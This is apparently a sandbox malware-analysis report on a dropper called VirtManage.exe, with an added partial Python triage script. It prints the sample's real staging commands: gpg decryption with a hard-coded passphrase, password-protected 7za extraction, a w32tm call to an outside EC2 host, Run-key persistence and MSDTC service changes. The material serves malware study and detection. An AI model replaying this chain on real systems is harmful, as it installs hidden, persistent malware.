Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 1_2_004014F0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004014F0
Source: libgcrypt-20.dll.0.dr | Static PE information: section name: /4
Source: libgpg-error-0.dll.0.dr | Static PE information: section name: /4
Source: libnpth-0.dll.0.dr | Static PE information: section name: /4
Source: libsqlite3-0.dll.0.dr | Static PE information: section name: /4
Source: zlib1.dll.0.dr | Static PE information: section name: /4
Source: gpg-agent.exe.0.dr | Static PE information: section name: /4
Source: gpg.exe.0.dr | Static PE information: section name: /4
Source: libassuan-9.dll.0.dr | Static PE information: section name: /4
Source: oleview.exe.0.dr | Static PE information: section name: fothk
Source: aclui.dll.0.dr | Static PE information: section names: .xdata, /4, /19, /31, /45, /57, /70, /81, /97, /113
Source: aclui-2.dll.19.dr | Static PE information: section names: .xdata, /4, /19, /31, /45, /57, /70, /81, /97, /113
Source: aclui.dll.19.dr | Static PE information: section names: .xdata, /4, /19, /31, /45, /57, /70, /81, /97, /113
Source: oleview.exe.19.dr | Static PE information: section name: fothk
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 1_2_630A01F2 push 41100E0Ah; ret 1_2_630A023C
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 1_2_6309A1F0 push ds; ret 1_2_6309A1F8
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 1_2_6309FA9C push 41140E0Ah; ret 1_2_6309FAAA
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 1_2_6309AC6B push ebx; iretd 1_2_6309ACF0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 1_2_6309ACE7 push ebx; iretd 1_2_6309ACF0
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\Users\user\AppData\Local\Temp\nsh85A.tmp\nsis7z.dll
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI3323.tmp
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg-agent.exe
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\WindowsUpdate24\libgcrypt-20.dll
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\WindowsUpdate24\libnpth-0.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | File created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\WindowsUpdate24\zlib1.dll
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\Users\user\AppData\Local\Temp\nsh85A.tmp\nsExec.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe | File created: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe | File created: C:\ProgramData\Microsoft\WindowsUpdate24\aclui-2.dll
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\WindowsUpdate24\libgpg-error-0.dll
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\LogUpdateWindows\aclui.dll
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\WindowsUpdate24\libassuan-9.dll
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\WindowsUpdate24\libsqlite3-0.dll
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI32C4.tmp
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | File created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe | File created: C:\ProgramData\Microsoft\WindowsUpdate24\aclui.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.dll

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Users\user\Desktop\VirtManage.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateOleview
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\Windows\SysWOW64\sc.exe sc config msdtc start= demand

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\VirtManage.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: 27.2.powershell.exe.21bb4f3ca58.0.raw.unpack, MqVvxIfGQaR.cs .Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: 27.2.powershell.exe.21bcc9b0000.1.raw.unpack, MqVvxIfGQaR.cs .Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: b0okydtw.dll.33.dr, MqVvxIfGQaR.cs .Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\VirtManage.exe Window / User API: threadDelayed 2387
Source: C:\Users\user\Desktop\VirtManage.exe Window / User API: threadDelayed 7534
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4999
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4867
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6949
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2734
Source: C:\Users\user\Desktop\VirtManage.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh85A.tmp\nsis7z.dll
Source: C:\Windows\SysWOW64\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3323.tmp
Source: C:\Users\user\Desktop\VirtManage.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\WindowsUpdate24\gpg-agent.exe
Source: C:\Users\user\Desktop\VirtManage.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh85A.tmp\nsExec.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\WindowsUpdate24\aclui-2.dll
Source: C:\Windows\SysWOW64\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI32C4.tmp
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\WindowsUpdate24\7za.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe API coverage: 0.5 %
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe API coverage: 0.4 %
Source: C:\Users\user\Desktop\VirtManage.exe TID: 6668 Thread sleep time: -238700s >= -30000s
Source: C:\Users\user\Desktop\VirtManage.exe TID: 6668 Thread sleep time: -753400s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2244 Thread sleep count: 4999 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2244 Thread sleep count: 4867 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5524 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5336 Thread sleep count: 6949 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1488 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764 Thread sleep count: 2734 > 30
Source: C:\Windows\System32\svchost.exe TID: 6984 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8108 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\VirtManage.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\VirtManage.exe Code function: 0_2_004068D4 FindFirstFileW,FindClose,0_2_004068D4
Source: C:\Users\user\Desktop\VirtManage.exe Code function: 0_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C83
Source: C:\Users\user\Desktop\VirtManage.exe Code function: 0_2_00402930 FindFirstFileW,0_2_00402930
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe Code function: 1_2_004CC650 strpbrk,FindFirstFileW,gcry_free,strlen,gcry_malloc,gcry_free,FindNextFileW,FindClose,gcry_free,FindClose,gcry_free,FindClose,1_2_004CC650
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe Code function: 3_2_004CC650 strpbrk,FindFirstFileW,gcry_free,strlen,gcry_malloc,gcry_free,FindNextFileW,FindClose,gcry_free,FindClose,gcry_free,FindClose,3_2_004CC650
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: gpg.exe, 00000005.00000002.922570019.0000000000828000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tEventVmNetworkAdapter',
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapterX
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E183F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ID": "QA3C3Spv34bEjMK7", "Data": "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"}p
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapterX
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapterX
Source: powershell.exe, 0000001B.00000002.3414690740.0000021BCCC20000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2851637829.0000021ACEA44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2851840157.0000021ACEA56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: gpg.exe, 0000000A.00000002.978724317.0000000000938000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrrn
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
Source: gpg.exe, 00000011.00000002.1005998234.00000000009C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Add-NetEventVmNetworkAdapter',
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E183F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: gpg.exe, 00000001.00000002.911511780.0000000000937000.00000004.00000020.00020000.00000000.sdmp, gpg.exe, 00000003.00000002.916722216.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000010.00000002.1001816369.000001FA2CB46000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 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>
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E183F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: svchost.exe, 00000020.00000002.2849938491.0000021AC942B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: 7za.exe, 00000007.00000003.952369092.00000189E3440000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 968B3FD3385208B479FE43CC__F5E8C90CE968B3FD3385208B479FE43CVMware.Binding.WsTrust1.0.0.0{4B1FEDDD-E8BD-8A4B-41BF-2D55E4FD9D86}VMWARE~1.DLL|VMware.Binding.WsTrust.dll_FD9BA260F6E682E262FA42F3C05C6925C__FD9BA260F6E682E262FA42F3C05C6925log4net669E0DDF0BB1AA2A2.0.15.0{2FA634FE-D1FF-771A-58EB-507FF9A0FFBB}LOG4NET.DLL|log4net.dllSourceDir[ProgramFilesFolder][Manufacturer]\[ProductName]DIRCA_TARGETDIRTARGETDIR=""{6DD554EC-2D48-B234-25FF-6CF5942A837D}C__70867F2D6BE94247A3BF24C2A1A54D81.:USER'S~1|User's Programs Menu
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"UUID": null, "ID": "QA3C3Spv34bEjMK7", "Data": "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"}
Source: VirtManage.exe, 00000000.00000003.1068983064.000000000467D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_<
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5812000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 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"}
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Get-NetEventVmNetworkAdapter',
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: hqjUOtrmaGNelteJyYLhuaXGZBaRtTrIWWvGhWPilmcCTUAomNXtQAorMtGXAujmRyVugqnEexGVjTMMnNNevchXuCwAxLUlQEhUzpbZZyAsSDJtCOLqqxuVbTHnovpheklTeCzQsMrdBzuarVyYCDqKvoUtuxlvUZoyLmElzQoRsUmUvbXfULtJkkiyAisFxlJMJqpgSvHVgdqyUbwMKxgewowQMKVwdbgTNKeGEVhsPbzpBoYijzROPgqgcfHYnOQcOcNaInCpwjkXZvZhlPHGFSqMhHyzSHXlvgjPPrIHwrihksbVKSjWUzsdsBTVYgixIXPgNujMSMSnCqadCNzvagqVRlcdeaCCYpAuBDQAomShpNDFKsQLOpFLw
Source: C:\Users\user\Desktop\VirtManage.exe API call chain: ExitProcess graph end node graph_0-3690
Source: C:\Users\user\Desktop\VirtManage.exe API call chain: ExitProcess graph end node graph_0-3841
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe Code function: 1_2_004014F0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004014F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe Process token adjusted: Debug
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe Code function: 1_2_0040118E __set_app_type,__p__fmode,__p__commode,Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,1_2_0040118E
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe Code function: 1_2_004011B3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,1_2_004011B3
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe Code function: 1_2_004013D1 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,1_2_004013D1
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe Code function: 3_2_0040118E __set_app_type,__p__fmode,__p__commode,Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,3_2_0040118E
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe Code function: 3_2_004011B3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,3_2_004011B3
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe Code function: 3_2_004013D1 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,3_2_004013D1

HIPS / PFW / Operating System Protection Evasion

Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe	Process created: Base64 decoded 6h,Vw~{n$j{]IUjnW"Ui^-UnxGi-zeZ&^rZ$x*&Lzfh^--%Z&ZjgGMjg$x^V{V'jwHjnWyUj["{ftg1zzn7jnWj[5)txxGru1.*'jwSgez^gX(b-zeZ&j[B)]"Ui^]Vm9rUi^UnxzXzy`5"{!VxEZ+b:&
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe	Process created: Base64 decoded 6h,Vw~{n$j{]IUjnW"Ui^-UnxGi-zeZ&^rZ$x*&Lzfh^--%Z&ZjgGMjg$x^V{V'jwHjnWyUj["{ftg1zzn7jnWj[5)txxGru1.*'jwSgez^gX(b-zeZ&j[B)]"Ui^]Vm9rUi^UnxzXzy`5"{!VxEZ+b:&
Source: C:\Users\user\Desktop\VirtManage.exe	Process created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\5FILE.1A.gpg
Source: C:\Users\user\Desktop\VirtManage.exe	Process created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\7za.dll --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\1FILE.1A.gpg
Source: C:\Users\user\Desktop\VirtManage.exe	Process created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\2FILE.1A.gpg
Source: C:\Users\user\Desktop\VirtManage.exe	Process created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24
Source: C:\Users\user\Desktop\VirtManage.exe	Process created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\Cert.txt --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\3FILE.1A.gpg
Source: C:\Users\user\Desktop\VirtManage.exe	Process created: C:\Windows\SysWOW64\w32tm.exe w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.com
Source: C:\Users\user\Desktop\VirtManage.exe	Process created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\4FILE.1A.gpg
Source: C:\Users\user\Desktop\VirtManage.exe	Process created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24
Source: C:\Users\user\Desktop\VirtManage.exe	Process created: C:\Windows\SysWOW64\sc.exe sc config msdtc start= demand
Source: C:\Users\user\Desktop\VirtManage.exe	Process created: C:\Windows\SysWOW64\sc.exe sc config msdtc obj= "LocalSystem"
Source: C:\Users\user\Desktop\VirtManage.exe	Process created: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe
Source: C:\Windows\SysWOW64\w32tm.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.com
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA360.tmp" "c:\Users\user\AppData\Local\Temp\b0okydtw\CSCB61681A6E66748218243D78918A832B.TMP"
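The process-creation entries above form a staging chain: gpg.exe decrypts the dropped .gpg blobs with a passphrase passed on the command line, 7za.exe unpacks the resulting password-protected archives into the same ProgramData directory, w32tm /monitor is pointed at an EC2 hostname (an NTP query issued by a signed Windows binary, which serves as a reachability or beacon check), sc reconfigures the MSDTC service to run as LocalSystem on demand, and oleview.exe is launched out of the extraction directory before PowerShell spawns csc.exe and whoami.exe. The following is an added example, not code from the report or from the sample: a Python triage over an event list constructed from these lines. The rule names, the internal-domain suffix list and the decrypt-extract-execute correlation are this example's own assumptions.

```python
"""Process-creation triage for the staging chain in the report.

Added example, not part of the Joe Sandbox report or the sample. EVENTS is
constructed from the "Process created" lines above; rule names, the
INTERNAL_SUFFIXES list and the chain correlation are this example's own.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image path of the creating process
    image: str    # image path of the created process
    cmdline: str  # command line as reported


WU24 = r"C:\ProgramData\Microsoft\WindowsUpdate24"
SAMPLE = r"C:\Users\user\Desktop\VirtManage.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed from the report's process-creation lines (PowerShell's own
# command line is left out; the rules below only need its parent/child links).
EVENTS = [
    ProcEvent(SAMPLE, WU24 + r"\gpg.exe", WU24 + r'\gpg.exe --passphrase "12345678" --batch --yes --output ' + WU24 + r"\tools.7z --decrypt " + WU24 + r"\5FILE.1A.gpg"),
    ProcEvent(SAMPLE, WU24 + r"\gpg.exe", WU24 + r'\gpg.exe --passphrase "12345678" --batch --yes --output ' + WU24 + r"\7za.dll --decrypt " + WU24 + r"\1FILE.1A.gpg"),
    ProcEvent(SAMPLE, WU24 + r"\gpg.exe", WU24 + r'\gpg.exe --passphrase "12345678" --batch --yes --output ' + WU24 + r"\7za.exe --decrypt " + WU24 + r"\2FILE.1A.gpg"),
    ProcEvent(SAMPLE, WU24 + r"\7za.exe", WU24 + r"\7za x " + WU24 + r"\tools.7z -pJerx#sdqWE45 -o" + WU24),
    ProcEvent(SAMPLE, r"C:\Windows\SysWOW64\w32tm.exe", r"w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.com"),
    ProcEvent(r"C:\Windows\SysWOW64\w32tm.exe", r"C:\Windows\System32\w32tm.exe", r"w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.com"),
    ProcEvent(SAMPLE, r"C:\Windows\SysWOW64\sc.exe", r"sc config msdtc start= demand"),
    ProcEvent(SAMPLE, r"C:\Windows\SysWOW64\sc.exe", r'sc config msdtc obj= "LocalSystem"'),
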